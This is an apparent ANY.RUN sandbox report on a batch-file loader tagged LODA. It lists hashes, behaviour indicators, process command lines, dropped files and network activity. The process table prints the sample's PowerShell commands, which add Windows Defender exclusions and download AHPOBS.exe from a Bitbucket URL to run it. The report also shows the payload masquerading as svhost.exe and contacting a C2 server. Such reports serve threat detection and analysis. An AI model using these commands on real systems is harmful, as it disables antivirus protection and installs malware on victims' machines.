File name:

loader3 - Copy.bat

Full analysis: https://app.any.run/tasks/83d1413d-f9dc-4c49-85d7-d9c87f1895bc
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: December 22, 2024, 20:45:26
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loda
loader
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text
MD5:

1999B1AAFB1DC1BB2645CA85EFDBDE1E

SHA1:

1639007816EA76843B72C4BB64DB0BE49694886B

SHA256:

573DA0CBFC357AD652402D12A0AFD1F90DDC6944B9B911A5A79144B189C95387

SSDEEP:

6:ho++AI4eGgdEYzPs++AIIzVr+fxiA8q2pPKB++AI4eGgdEEFACp+tXzp3:+EsuUUEVr+ZiRsBEsuEJUtjN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 6260)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7152)

    • Adds process to the Windows Defender exclusion list

      • cmd.exe (PID: 6260)

    • LODA has been detected (SURICATA)

      • AHPOBS.exe (PID: 936)

    • Connects to the CnC server

      • AHPOBS.exe (PID: 936)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6260)

    • Probably download files using WebClient

      • cmd.exe (PID: 6260)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 6260)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7152)
      • AHPOBS.exe (PID: 936)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6260)

    • Script adds exclusion process to Windows Defender

      • cmd.exe (PID: 6260)

    • Application launched itself

      • cmd.exe (PID: 6260)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6260)

    • The executable file from the user directory is run by the CMD process

      • AHPOBS.exe (PID: 936)

    • The process creates files with name similar to system file names

      • AHPOBS.exe (PID: 936)

    • Contacting a server suspected of hosting an CnC

      • AHPOBS.exe (PID: 936)

    • Connects to unusual port

      • AHPOBS.exe (PID: 936)

  • INFO

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 5092)

    • Disables trace logs

      • powershell.exe (PID: 7152)

    • Checks proxy server information

      • powershell.exe (PID: 7152)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 5092)

    • The sample compiled with english language support

      • powershell.exe (PID: 7152)
      • AHPOBS.exe (PID: 936)

    • Reads mouse settings

      • AHPOBS.exe (PID: 936)

    • Checks supported languages

      • AHPOBS.exe (PID: 936)

    • Reads the computer name

      • AHPOBS.exe (PID: 936)

    • Creates files or folders in the user directory

      • AHPOBS.exe (PID: 936)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
141
Monitored processes
7
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe powershell.exe no specs cmd.exe no specs #LODA ahpobs.exe

Process information

PID
CMD
Path
Indicators
Parent process
936C:\Users\admin\AppData\Local\Temp\AHPOBS.exe ;C:\Users\admin\AppData\Local\Temp\AHPOBS.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Version:
3, 3, 8, 1
Modules
Images
c:\users\admin\appdata\local\temp\ahpobs.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\psapi.dll
3736cmd.exe /c C:\Users\admin\AppData\Local\Temp\AHPOBS.exe;C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
5092powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\admin\AppData\Local\Temp\AHPOBS.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6260C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\loader3 - Copy.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
6268\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6340powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\admin\AppData\Local\Temp"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7152powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\admin\AppData\Local\Temp\AHPOBS.exe')";C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events
16 286
Read events
16 286
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
1
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
6340powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jc2nkgix.5rc.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7152powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_u00vm12s.0po.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6340powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_izvd3xmb.ska.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5092powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lgt0ggrb.pn3.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5092powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_z4ksw0rs.a3e.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6340powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:96671893A95FF9A808E4CE5CE66642E9
SHA256:D1793F268D4B4EFCF9F641C99E4484F25C448765E5D1569A54F3B17326031CCD
7152powershell.exeC:\Users\admin\AppData\Local\Temp\AHPOBS.exeexecutable
MD5:A9C526F3A276012D554AC382A90BCA3D
SHA256:7230B549346DBAB880D1D713D8C9DFC1005065C0F0CEBB16AD4F1A15F05D088A
7152powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_psd5ohrq.ru5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
936AHPOBS.exeC:\Users\admin\AppData\Roaming\Windata\svhost.exeexecutable
MD5:A9C526F3A276012D554AC382A90BCA3D
SHA256:7230B549346DBAB880D1D713D8C9DFC1005065C0F0CEBB16AD4F1A15F05D088A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
36
DNS requests
20
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.48.23.167:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6472
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
5028
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5028
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.48.23.167:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
104.126.37.144:443
www.bing.com
Akamai International B.V.
DE
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
40.126.32.68:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
  • 40.127.240.158
whitelisted
google.com
  • 142.250.184.238
whitelisted
crl.microsoft.com
  • 23.48.23.167
  • 23.48.23.169
  • 23.48.23.164
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
www.bing.com
  • 104.126.37.144
  • 104.126.37.160
  • 104.126.37.177
  • 104.126.37.162
  • 104.126.37.129
  • 104.126.37.128
  • 104.126.37.153
  • 104.126.37.136
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 40.126.32.68
  • 20.190.160.20
  • 40.126.32.76
  • 40.126.32.72
  • 40.126.32.74
  • 20.190.160.22
  • 40.126.32.134
  • 40.126.32.136
whitelisted
go.microsoft.com
  • 23.35.238.131
whitelisted
bitbucket.org
  • 185.166.143.49
  • 185.166.143.48
  • 185.166.143.50
shared
bbuseruploads.s3.amazonaws.com
  • 54.231.128.81
  • 3.5.25.114
  • 16.15.176.168
  • 54.231.195.209
  • 3.5.30.235
  • 52.216.38.97
  • 54.231.133.169
  • 3.5.30.234
shared

Threats

Found threats are available for the paid subscriptions
6 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
loader3 - Copy.bat